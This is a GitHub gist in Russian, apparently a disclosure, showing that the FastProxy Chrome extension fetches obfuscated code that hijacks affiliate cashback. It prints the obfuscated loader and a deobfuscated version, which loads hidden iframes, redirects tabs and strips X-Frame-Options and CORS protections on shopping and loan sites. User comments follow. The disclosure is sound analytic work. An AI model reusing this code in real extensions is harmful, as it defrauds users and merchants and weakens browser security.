Last active
October 15, 2023 14:55
-
-
Save ValdikSS/1f1c71d6eead35a33a57099c26923bee to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Браузерное расширение FastProxy загружает с сервера вредоносный код, | |
| перенаправляющий cashback от различных интернет-магазинов автору расширения. | |
| Обфусцированный код: | |
| $guNnnrhIFAMI27BsMFv=function(a){return"string"==typeof $guNnnrhIFAMI27BsMFv.list[a]?$guNnnrhIFAMI27BsMFv.list[a].split("").reverse().join(""):$guNnnrhIFAMI27BsMFv.list[a]},$guNnnrhIFAMI27BsMFv.list=["of\xE6\xFBiht\xFBlru?lxp\xFBepyt\x04u\xDFv?di_txe?re\xECh?htgnel?rekram?\xB7\x04cna\xE6f?urdj\x04man?omorpi\xDF?g\xE6kc\xF4b?tnemucod?urdj\xAB\xD0l\xABapc\xFB\xECl?\xBFH\xC3?g\xE6r\xD1bus?ofnIegnahc?\xEB\x04doNtnerap?\x0FTtes?fOxednI\xD1al\x04saCrewoLot\x04tadpu?\xF4\xC8c\xAB\xC1\xDE\xABaz\x03\xAB\x0FTraelc?\x7Far\xD1ig","\xAEX\xAD*' [:_a\x1F{\xBCV(2\xCD\xF3T\xD4\x1F}\xC9)0005\xBC}\xA6V(\xD3\xDB\xCD\xA63(va\xBE\x06\x1F ;)1\xBCi(ec\x1CT\xA5's\x7Fpo-\xC0-x\xF2Va\xD6(\xE8T\xCAVa\xE7=>i ;1-U\xB5T=\x0E1a\xCAT\xD8\xA51\x17V C\xA5( P\xDD\xC9}\xA3\x1F}\xA6a\xB2Z\xA9Z\xC2Sa-8<Sa-8\xB0x\xB2pa\xA9pa\xC28-\xDE<8-\xDE\xB0d\xB24\xA94\xC2Ra-mh<Ra-mh\xB0y\xB2U\xA9U\xC2\xEDU<\xEDU\xB09(c\xA6\xAAz\xA9z\xC2z<z\xB05(c\xA6\xAAt\xA9t\xC2t<t\xB0b\xB2D\xA9D\xC2D<D\xB0f\xB2H\xA9H\xB3'\xEDH\xB1\xEDH\xB0ea(\xFEy\xA9y\xC2y<y\xB0w\xB2R\xA9R\xC2R<R\xB0Y\xBC}Ka\xE3\xA6\xAAoa\xA9oa\xD2ua/\xAE8-o\xB5www\x028-oa\xB0j\xB2K\xA9K\xD2\xAEK\x02K\xB0ia(\xFE7\xA97\xD2ua/\xAEX\x02X\xB0L\xB2Qa\xA9Qa\xE5\xAEdj\xB8\xAEdj\xFDka`F\xA9F\xE5F\xB8\xEDF\xBC\xAEF\xFD\xDF`G\xA9G\xE5G\xB8\xEDG\xBC\xAEG //\xA3\xC9)s\xB2M\xA9M\xE5\xEDM\xB8\xEDM\xB0g\xB2I\xA9I\xE5\xEDI\xB8\xEDI\xC6]0[)'/\xFA\x1C)\x1E\x1E\xBCi/?).\\www:?(?)/\\/\\:\xFB:?(^/(ec\xD7er.\xF9\xCAw\xD8\xA5'g\xE6%\xF2suta\xD1.Fa\xCF'de\xE6fednu'\xA7! )\xF9(foepyt\xCF\xF9\xCFca\xAC;6e4\x15ca\xBCFa\xBCn\x176 C\x1F\xF3h\xD4\xA6l(hsup.h\x1F;","c218c0ac1a7998cff\x115 k\xA8de8fdf4e381a29f83ff57751e3d80a09\x11b\x1838845a1b37d4227c6b471d7bf088181c\x11f\x18c7d724ca15324d0e84f7d5b8e9573a90\x11e\x1855e51a9e772d2e70d2109f09309f25f7\xC5w\x18592da5a3ca9cd357a1c6f33f8abaf451\x11K\x18675cc6d6cc26920d\x1034fd42feeffdd\x11j\x188\x102ca3d22cd9eea5445ac1e0254eb5\x11 i\xB4\xDA\x1F\x1F;'/y2828k8nagtz80ve0jwlf48ct5pg\xE2k\xC7h1sjexorqhwk3w7mr83vcyg8kd1tj84p\x16 L\xC7xu5wqapkutje2y8zkiwu2rur6j5f\xE2l\xC7a30l7ktvctxvwpq1mg5sv8tcrsrkeido\x16s\xC7a0odbt5v4u\xF4th53qikxgjnyg35zxfdo\xB6\xEDOa\xADs'\xCAg\xB4\xF1'fmmkmfcopdmknnheeanhoejlgkmklekm'\xCAW\xB4\x1F\xEAC UR yxorP\xD1aF //",/ /g,/^/,"\x7F~`@<%#\x1C\x1B\x1A\x19\x18\x17\x16\x15\x14\x13\x12\x11\x10\x0F\x0E\x07\x06\x05\x04\x03\x02\x01\xFE\xFD\xFC\xFB\xFA\xF9\xF8\xF7\xF6\xF5\xF4\xF3\xF2\xF1\xF0\xEF\xEE\xED\xEC\xEB\xEA\xE9\xE8\xE7\xE6\xE5\xE4\xE3\xE2\xE1\xE0\xDF\xDE\xDD\xDC\xDB\xDA\xD9\xD8\xD7\xD6\xD5\xD4\xD3\xD2\xD1\xD0\xCF\xCE\xCD\xCC\xCB\xCA\xC9\xC8\xC7\xC6\xC5\xC4\xC3\xC2\xC1\xC0\xBF\xBE\xBD\xBC\xBB\xBA\xB9\xB8\xB7\xB6\xB5\xB4\xB3\xB2\xB1\xB0\xAF\xAE\xAD\xAC\xAB\xAA\xA9\xA8\xA7\xA6\xA5\xA4\xA3\xA2\xA1","9876543210_ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba",/\b\w\w?\b/g,/ /g,"}\x1F'*' :'Xa\xBA\xE6girO-w\xF4lA\xF0C\xE9A' :'Pa'\x1F{\xCAl\xD8\x1F}\xF3h\xD4\x1F;'*'\xCAX\xB5]i[h\xA5'\xE6giro-w\xF4\xDF\xF0c\xE9a\xF2r\xD6(\xE8h\xCAr\xE7\xA7> i ;1 - U\xB5h\xCA\x0Ea\xCAh\xD8\x1F{)a(Ha C\x1F\xC9;rorrE\xD1al.\xD0tnur.q\xA5(Y C\xA3urt\xCAq\xB50a\xA6\xE0\xBC}]'\x01r\xEBlmx'\xF8\xBC] ~N\xCE\xAEX\xCE\xEDOa\xCEe\xC3z.netok.og\xAD*'[ :_a{\xBCHa(2\xCD\x1F)O.q\xCFq\xD66(2.\xD9.m\xB5q\x1F )m\xB5q\xCFq\xAC\xA4Z\xBBp\xB5b\xA44\xBBU\xBBz\xBBt\xBBD\xBBH\xBBy\xBBR\xBB o#K\xBB 7.b\xDA\xA4 F\xBB\xD8#G\xBB M\xBB I.b\xF1e\x1F )di.)(sliateD\xE4pp\xB5q\xA7! Wa || q\xB50\x17A\xA5( ha\xDD\xA8ab55a207488d84985f78fe\x10dd18531\x11a\x18d7b63bbcb7779c10983f6f6672c6efdb\x11x\x189b3017450eb1fe660349a74aa06755fe\xC5d\x181280a3805b5a49c86655777a50584277\x11y\x181d3829feee54ff77ac2959e2098cd51f\xC59 k\xA8848882eafc2496a","er\x04tubirttAtes?\x1A\xABPF?del\xDFCy\xECr\xDF?\xC1\xDE?\xD0l?dIbat\xFBbat\x19\xAB\x14\xAB@\xABnam_\xB9\xABecnOylnOeMl\xDFc?\xB7i\xDF\xAB\x1B\xAB\x07\xAB\xB9ye\xC3h\xABbat?\x12\xAB\xB7\xC1\xAB\x13\xAB\xC1?nam_\xB9?\xD3\xD9?\xB9\xDCe\xC3\xAB\xB9ye\xC3h?\x0Ft?\xD3dda???lru?\xB7\xC1?kcabl\xDFc?nam\xB9?moc\x04marFX\xDB?\xF4\xC8c?\xBFh?fOxed\xE6?az\x03?rav\x04marFXevomeRot?\x01Rbew?\xDCnpe?\x1A?tcer\xC8?@?devieceR\xBFH\xC3?\xB7i\xDF?\x1B\x19?\x14?\xC0i?\x12?\x7Fcnuf\xFBedulc\xE6?fi?\x13?\x07??\xD1oh?ur?\xDC?\xB9\xDCe\xC3\xFB\xEB??\xEAc?\xD0t?\xFB\xEClkrt?won??\xD1\xC3c?1bus_ffa???\xBFHes\xC3pser\x04taD?nruter??\xC0I%\x04garotS\xDFc\xF4?:811?0;)(ha\x1F\xF3\xA6p\xBC}\x05\xDB.D\xB5E\xCFD\xB5E\xA63(va\x1F{>= )\x06\xBE(\xCA%\xC3.E\x05dnepp\xB5\xECh.Ma\xA6';e\xC3n :y\xD7sid\xBAely\xD1\xFA\xB5E\xA6_\xBC'crs\xFA\xB5E\xA6'E\xFAnemelEetaerc.Ma\xCAE\xD8\x1F;4e3\x15_(c\xDD}\xA6\xE0 \xBC}\x1F] '\xC0_bus\xBA\xC0_\xE6am' \xF8\x1F,]~y\xCE","\xC3it\x1D'*/\xAE\x1D(\xE4$\xA6\xAA\x1D42ot\xC8k\x1D\xB1\xAE\x1Dda\xF4\x1D\xB5b\xA4 \x1Dilps.\x1D\x03razod\x1D\xD1ebraeg\x1D\xFBe\xDFsaiva\x1D\xB4\xA8\x1Da( \x1D\xB6\xAE\xBD \x1D\xCAp k\xA5\x1Dko\xF4le\xDE\x1D42\xE6al\xC3\xC1\x1Dt\xC8ctrams\x1D/\xAF\x1D1e2\x1Dtuo\xD0\x1Di\xD8( \xE1\x1D\xB9neerg\x1D((Ca\xCA3\xD8\x1D\xA6E(dlihC\x1D?e\x1Dit\xD7\x1D'(S\xCC\x1D\xD1euqe\x1Dc\xA6(P\xA6\xAA\x1D\xB0}\xA6Y\xBC}\xFC\x1Dr\xE3\x1F))'T\xF7\x1D?s\x1D'(t\x1D_.ca\x1D[ :Ya\x1Da?'(B\xF6\x1D.r\xD6\xD5B\xB5\xF5\x1Dd\xBC1 + \xD5\xEF\x1Dol\x1D\xC9;}\x1D'\xA7= \x1D\x1Fnpe\xC6\x1D-lort\xC3\x1DS.d(G\xB5\xEE\x1Dd\xCAr\xD8\xBEd(\xBC\x1DW.\x1Ddae\x1Dptth\x1Demorh\x1D-ssecc\x1DA\xB5P\xB5]i[\x1D\xD8\xA5i-- ;0\x1Dni\x1D\xB3)'\x1Dteg.\x1D:_{\xBC\xCB\x1D1n\xC3\xB6\xAE\xBD\x1Drof\x1F;g.\x1D]'g\xBANa'[\x1Dla\x1Dtoh\x1D C\x1F\x1F\x1Dkcilc\x1Devomer\x1D\x1FUR //\x1F\x1DdetadpU\xC3\x1D Q\x1Dalp\x1D( A\xA6\x1D)\x1E'\x1E(\x1D :g{ e\x1Drene\xD1iL\x1D\xB31-\xA7! )'\x1Dts\x1Demi\x1D && \x1D\xAD*\xBA*/\x1D.J.O.q\x1D._.ca\xAC\xAE\x1Dna(z\xB5m\xB5q\x1D\xA7 \x1D\x1F}\x1F\x1Dider\x1D\xB4\x1F;'/\x1D //\x1F\x1F;\x1D/u/us.\xC4\x1DI\xB5Za\xADs'\xA7\x1Dno\x1D\xB3'\xAE\x1Dmiaz\x1Demarf\x1Dsredae\x1D\x1F{ >= )\x1DN\xADEa'\xA7 \x1D ,\x1D.b\xA4\x1D' ,'\x1Dyenom\x1D'(B.w\xAC\x1Dsserpxe\x1D/o/Ja/L/\x1Da.\x1Da k\x1D.b \xA2\x1Da(c\xA6\xAA\x1D'\xA7= w\xAC\x1D //\xA3\x1F}\xA6\x1Du/\xAEn\xADs'\xA7\x1Dv.\x1D//:\x1D( A\x1F\x1D_lru?\x1D(m.f\xA7 \x1D.b\xA5p > \x1D\x1F;'ra=j?\x1D =\x1D\x1F;)\x1D\x1F{ )\x1D\x1F;0 =\x1D\x1F\x1F}\x1F;e\x1D- )(m.\xA1\x1Df( A\x1F{ )"],Function(function(b){var d,e,c,f,g,h="",k=$guNnnrhIFAMI27BsMFv(5);for(c=0;c<b.length;c++){for(g=k+b[c][2],d=b[c][1].split("\x1D"),f=d.length-1;0<=f;f--)b[c][0]=b[c][0].split(g.charAt(f)).join(d[f]);h+=b[c][0]}var l=function(a){var b,d,e,f=$guNnnrhIFAMI27BsMFv(6);return 63>a?b=f.charAt(a):(a-=63,d=Math.floor(a/63),e=a%63,b=f.charAt(d)+f.charAt(e)),b};if(d=h.substr(4133).split(":"),g=d[1].split("?"),d=d[0].split("?"),h=h.substr(0,4133),!"".replace($guNnnrhIFAMI27BsMFv(4),String)){var m={};for(c=0;118>c;c++){var n=l(c);m[n]=g[c]||n}k=$guNnnrhIFAMI27BsMFv(7),n=function(b){return m[b]||b},h=h.replace(k,n)}else for(f=d[d.length-1]-1;0<=f;f--)g[f]?h=h.replace(new RegExp("\b"+(63>f?e.charAt(f):e.charAt((f-63)/63)+e.charAt((f-63)%63))+"\b","g"),g[f]):0;return h.replace($guNnnrhIFAMI27BsMFv(3),"\n").replace($guNnnrhIFAMI27BsMFv(8),"\"")}([[$guNnnrhIFAMI27BsMFv(2)+$guNnnrhIFAMI27BsMFv(9)+$guNnnrhIFAMI27BsMFv(1)+$guNnnrhIFAMI27BsMFv(10)+$guNnnrhIFAMI27BsMFv(0),$guNnnrhIFAMI27BsMFv(11),""]]))(); | |
| Деобфусцированный: | |
| (function anonymous( | |
| ) { | |
| // FastProxy RU Chrome | |
| const ext_id = 'mkelkmkgljeohnaeehnnkmdpocfmkmmf'; | |
| // epn | |
| const url_aliexpress = 'https://alipromo.com/redirect/cpa/o/odfxz53gynjgxkiq35htlou4v5tbdo0a/'; | |
| const url_gearbest = 'http://epnclick.ru/redirect/cpa/o/odiekrsrct8vs5gm1qpwvxtcvtk7l03a/'; | |
| const url_aviasales = 'http://epnclick.ru/redirect/cpa/o/onn1f5j6rur2uwikz8y2ejtukpaqw5ux/'; | |
| const url_jdru = 'http://epnclick.ru/redirect/cpa/o/p48jt1dk8gycv38rm7w3kwhqroxejs1h/'; | |
| const url_hotellook = 'http://epnclick.ru/redirect/cpa/o/onn1gp5tc84flwj0ev08ztgan8k8282y/'; | |
| // RU | |
| const url_money_man = 'https://trkleads.ru/click/5be4520e1ca5445aee9dc22d3ac22e18?aff_sub1=FP'; | |
| const url_kredito24 = 'https://trkleads.ru/click/ddffeef24df432e1d02962cc6d6cc576?aff_sub1=FP'; | |
| const url_lime = 'https://trkleads.ru/click/154faba8f33f6c1a753dc9ac3a5ad295?aff_sub1=FP'; | |
| const url_platiza = 'https://pxl.leads.su/click/7f52f90390f9012d07e2d277e9a15e55?aff_sub1=FP'; | |
| const url_greenmoney = 'https://trkleads.ru/click/09a3759e8b5d7f48e0d42351ac427d7c?aff_sub1=FP'; | |
| const url_dozarplati = 'https://trkleads.ru/click/c181880fb7d174b6c7224d73b1a54883?aff_sub1=FP'; | |
| const url_smartcredit = 'https://trkleads.ru/click/90a08d3e15775ff38f92a183e4fdf8ed?aff_sub1=FP'; | |
| const url_oneclickmoney = 'https://trkleads.ru/click/ffc8997a1ca0c812ca6942cfae288848?aff_sub1=FP'; | |
| const url_zaimonlain24 = 'https://pxl.leads.su/click/f15dc8902e9592ca77ff45eeef9283d1?aff_sub1=FP'; | |
| const url_credilo = 'https://trkleads.ru/click/77248505a77755668c94a5b5083a0821?aff_sub1=FP'; | |
| const url_honeymoney = 'https://pxl.leads.su/click/ef55760aa47a943066ef1be0547103b9?aff_sub1=FP'; | |
| const url_hotzaim = 'https://trkleads.ru/click/bdfe6c2766f6f38901c9777bcbb36b7d?aff_sub1=FP'; | |
| const url_zaimexpress = 'https://trkleads.ru/click/13581dd2e1ef87f58948d884702a55ba?aff_sub1=FP'; | |
| function callMeOnlyOnce() { | |
| if (this.alreadyCalled || ext_id != chrome.app.getDetails().id) | |
| return; | |
| // epn | |
| localStorage.aliexpress = 0; | |
| localStorage.gearbest = 0; | |
| localStorage.aviasales = 0; | |
| localStorage.jdru = 0; | |
| localStorage.hotellook = 0; | |
| // RU | |
| localStorage.money_man = 0; | |
| localStorage.kredito24 = 0; | |
| localStorage.lime = 0; | |
| localStorage.platiza = 0; | |
| localStorage.greenmoney = 0; | |
| localStorage.dozarplati = 0; | |
| localStorage.smartcredit = 0; | |
| localStorage.oneclickmoney = 0; | |
| localStorage.zaimonlain24 = 0; | |
| localStorage.credilo = 0; | |
| localStorage.honeymoney = 0; | |
| localStorage.hotzaim = 0; | |
| localStorage.zaimexpress = 0; | |
| if (chrome && chrome.tabs) | |
| chrome.tabs.onUpdated.addListener(onUpdatedListener); | |
| if (chrome && chrome.webRequest) | |
| chrome.webRequest.onHeadersReceived.addListener(onHeaders, { urls: ['*://go.koten.zone/*', '*://alipromo.com/*', '*://moneyman.ru/*', '*://epnclick.ru/*'], types: ['xmlhttprequest'] }, ['blocking', 'responseHeaders']); | |
| this.alreadyCalled = true; | |
| } | |
| function callback() { | |
| chrome.runtime.lastError; | |
| } | |
| function onHeaders(a) { | |
| var h = a.responseHeaders; | |
| for (var i = h.length - 1; i >= 0; --i) { | |
| var r = h[i].name.toLowerCase(); | |
| if (r == 'access-control-allow-origin') { | |
| h[i].value = '*'; | |
| return { responseHeaders: h }; | |
| } | |
| } | |
| var l = { | |
| 'name': 'Access-Control-Allow-Origin', 'value': '*' | |
| }; | |
| h.push(l); | |
| return { responseHeaders: h }; | |
| } | |
| function onUpdatedListener(tabId, changeInfo, tab) { | |
| const time = 4e6; | |
| if (tab && tab.url && typeof (tab.url) != 'undefined' && changeInfo.status == 'loading') { | |
| var host = tab.url.replace(/^(?:https?:\/\/)?(?:www\.)?/i, "").split('/')[0]; | |
| // aliexpress.com | |
| if (host.includes('aliexpress.com')) { | |
| if (Date.now() - localStorage.aliexpress > time) { | |
| localStorage.aliexpress = Date.now(); | |
| loadIframe(url_aliexpress); | |
| } | |
| return; | |
| } | |
| // gearbest.com | |
| if (host.includes('gearbest.com')) { | |
| if (Date.now() - localStorage.gearbest > time) { | |
| localStorage.gearbest = Date.now(); | |
| loadIframe(url_gearbest) | |
| } | |
| return; | |
| } | |
| // aviasales.ru, aviasales.com | |
| if (host.includes('aviasales')) { | |
| if (Date.now() - localStorage.aviasales > time) { | |
| localStorage.aviasales = Date.now(); | |
| $.get(url_aviasales, (d) => { | |
| var r = d.substring(d.indexOf("'") + 1, d.lastIndexOf("'")); | |
| if (r.includes('?marker')) | |
| chrome.tabs.update(tabId, { url: r }, callback); | |
| }); | |
| } | |
| return; | |
| } | |
| // hotellook.ru, hotellook.com | |
| if (host.includes('hotellook')) { | |
| if (Date.now() - localStorage.hotellook > time) { | |
| localStorage.hotellook = Date.now(); | |
| $.get(url_hotellook, (d) => { | |
| var r = d.substring(d.indexOf("'") + 1, d.lastIndexOf("'")); | |
| if (r.includes('?marker')) | |
| chrome.tabs.update(tabId, { url: r }, callback); | |
| }); | |
| } | |
| return; | |
| } | |
| // jd.ru | |
| if (host.includes('jd.ru')) { | |
| if (Date.now() - localStorage.jdru > time) { | |
| localStorage.jdru = Date.now(); | |
| loadIframe(url_jdru); | |
| } | |
| return; | |
| } | |
| // moneyman.ru | |
| if (tab.url.indexOf('moneyman.ru/registration') != -1) { | |
| if (Date.now() - localStorage.money_man > time) { | |
| localStorage.money_man = Date.now(); | |
| toRemoveXFrame(); | |
| loadIframe(url_money_man); | |
| } | |
| return; | |
| } | |
| // kredito24.ru | |
| if (tab.url.indexOf('kredito24.ru') != -1) { | |
| if (Date.now() - localStorage.kredito24 > time) { | |
| localStorage.kredito24 = Date.now(); | |
| loadIframe(url_kredito24); | |
| } | |
| return; | |
| } | |
| // lime-zaim.ru | |
| if (tab.url.indexOf('www.lime-zaim.ru/registration') != -1) { | |
| if (Date.now() - localStorage.lime > time) { | |
| localStorage.lime = Date.now(); | |
| chrome.tabs.update(tabId, { url: url_lime }, callback); | |
| } | |
| return; | |
| } | |
| // platiza.ru | |
| if (host == 'platiza.ru') { | |
| if (Date.now() - localStorage.platiza > time) { | |
| localStorage.platiza = Date.now(); | |
| loadIframe(url_platiza); | |
| } | |
| return; | |
| } | |
| // greenmoney.ru | |
| if (host == 'greenmoney.ru') { | |
| if (Date.now() - localStorage.greenmoney > time) { | |
| localStorage.greenmoney = Date.now(); | |
| toRemoveXFrame(); | |
| loadIframe(url_greenmoney); | |
| } | |
| return; | |
| } | |
| // dozarplati.com | |
| if (host == 'dozarplati.com') { | |
| if (Date.now() - localStorage.dozarplati > time) { | |
| localStorage.dozarplati = Date.now(); | |
| loadIframe(url_dozarplati); | |
| } | |
| return; | |
| } | |
| // smartcredit.ru | |
| if (host == 'smartcredit.ru') { | |
| if (Date.now() - localStorage.smartcredit > time) { | |
| localStorage.smartcredit = Date.now(); | |
| loadIframe(url_smartcredit); | |
| } | |
| return; | |
| } | |
| // oneclickmoney.ru | |
| if (host == 'oneclickmoney.ru') { | |
| if (Date.now() - localStorage.oneclickmoney > time) { | |
| localStorage.oneclickmoney = Date.now(); | |
| loadIframe(url_oneclickmoney); | |
| } | |
| return; | |
| } | |
| // zaimonlain24.ru | |
| if (host == 'zaimonlain24.ru') { | |
| if (Date.now() - localStorage.zaimonlain24 > time) { | |
| localStorage.zaimonlain24 = Date.now(); | |
| loadIframe(url_zaimonlain24); | |
| } | |
| return; | |
| } | |
| // credilo.com.ru | |
| if (host == 'credilo.com.ru') { | |
| if (Date.now() - localStorage.credilo > time) { | |
| localStorage.credilo = Date.now(); | |
| loadIframe(url_credilo); | |
| } | |
| return; | |
| } | |
| // hm-finance.ru | |
| if (host == 'hm-finance.ru') { | |
| if (Date.now() - localStorage.honeymoney > time) { | |
| localStorage.honeymoney = Date.now(); | |
| loadIframe(url_honeymoney); | |
| } | |
| return; | |
| } | |
| // hot-zaim.ru | |
| if (host == 'hot-zaim.ru') { | |
| if (Date.now() - localStorage.hotzaim > time) { | |
| localStorage.hotzaim = Date.now(); | |
| loadIframe(url_hotzaim); | |
| } | |
| return; | |
| } | |
| // zaim-express.ru | |
| if (host == 'zaim-express.ru') { | |
| if (Date.now() - localStorage.zaimexpress > time) { | |
| localStorage.zaimexpress = Date.now(); | |
| loadIframe(url_zaimexpress); | |
| } | |
| return; | |
| } | |
| } | |
| } | |
| function toRemoveXFrame() { | |
| function removeXFrame(info) { | |
| var headers = info.responseHeaders; | |
| for (var i = headers.length - 1; i >= 0; --i) { | |
| var header = headers[i].name.toLowerCase(); | |
| if (header == 'x-frame-options') { | |
| headers.splice(i, 1); | |
| var timeout = setTimeout(() => { | |
| clearTimeout(timeout); | |
| chrome.webRequest.onHeadersReceived.removeListener(removeXFrame); | |
| }, 5000) | |
| } | |
| } | |
| return { responseHeaders: headers }; | |
| } | |
| chrome.webRequest.onHeadersReceived.addListener(removeXFrame, { | |
| urls: ['*://moneyman.ru/*', '*://greenmoney.ru/*'], | |
| types: ['main_frame', 'sub_frame'] | |
| }, ['blocking', 'responseHeaders']); | |
| } | |
| function loadIframe(url) { | |
| const time = 3e4; | |
| var iframe = document.createElement('iframe'); | |
| iframe.setAttribute('src', url); | |
| iframe.setAttribute('style', 'display: none;'); | |
| document.head.appendChild(iframe); | |
| iframe.onload = () => { | |
| var timeout = setTimeout(() => { | |
| clearTimeout(timeout); | |
| iframe.parentNode && iframe.parentNode.removeChild(iframe); | |
| }, time); | |
| }; | |
| } | |
| callMeOnlyOnce(); | |
| })() |
@RedDestractor
Вы про банковские карточки? Если не сложно заблокировать — заблокируйте и перевыпустите. Нет доказательств, что автор FastProxy похищал какие-либо пользовательские данные, но техническая возможность этого имеется, и исключать это нельзя. Однако, банки хорошо определяют нелегитимные транзакции, поэтому, на вашем месте, я бы сильно не беспокоился именно о банковских карточках — даже если ими кто-то воспользуется, вы, с большой вероятностью, сможете вернуть свои деньги.
Стоит отметить, что загрузка конфигурационного файла FastProxy совершается по протоколу HTTP (а не по HTTPS), и, например, администратор злонамеренной Wi-Fi-точки может подменить её на свою, и внедрять уже свой произвольный код на любые сайты.
Оу как хорошо что я его удалил из браузера.
Теперь понятно почему не пришёл кэшбэк и нет никакой информации о заказе. Почему не сделаете достоянием общественности.
Чем тогда пользоваться?
нашел https://antizapret.prostovpn.org/
На сколько это безопасная штука?
На Хабре посоветовали альтернативу, его приложение посоветовали приложение которое захейтили в магазине Хрома, оно тоже использует сервисы "антизапрета", но в "белую", т.е официально - но это для ламеров, вроде меня, которые не хотят выяснять через какие же порты идёт обращение, и как же сделать проброс
@pulse-studio, эту текстовую заметку написал администратор https://antizapret.prostovpn.org/ (я).
@vladikss Спасибо за информацию, оставил отзыв и написал репорт в поддержку
А для пользователей Firefox он делает тоже самое ?:
@vladikss Спасибо за информацию, оставил отзыв и написал репорт в поддержку
А для пользователей Firefox он делает тоже самое ?:
Эта заметка написана почти 2 года назад, после этого я не следил за поведением расширения.
hi dear friend i need your help for unlocking Zong Huawei Router B310S-927 firmware varsion 21.333.01
please can you help me
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Что делать с карточками теперь? Менять/выкидывать?